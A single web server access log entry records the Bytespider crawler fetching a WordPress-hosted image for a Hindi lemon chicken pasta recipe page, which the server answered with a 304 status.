47.128.47.84 - - [20/Oct/2025:08:12:48 -0400] "GET /wp-content/uploads/2016/03/%E0%A4%90%E0%A4%B8%E0%A5%87-%E0%A4%AC%E0%A4%A8%E0%A4%BE%E0%A4%8F%E0%A4%82-%E0%A4%B2%E0%A5%87%E0%A4%AE%E0%A4%A8-%E0%A4%9A%E0%A4%BF%E0%A4%95%E0%A4%A8-%E0%A4%AA%E0%A4%BE%E0%A4%B8%E0%A5%8D%E0%A4%A4%E0%A4%BE.jpg HTTP/2.0" 304 - "https://hindi.blushin.com/lemon-chicken-pasta-recipe/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
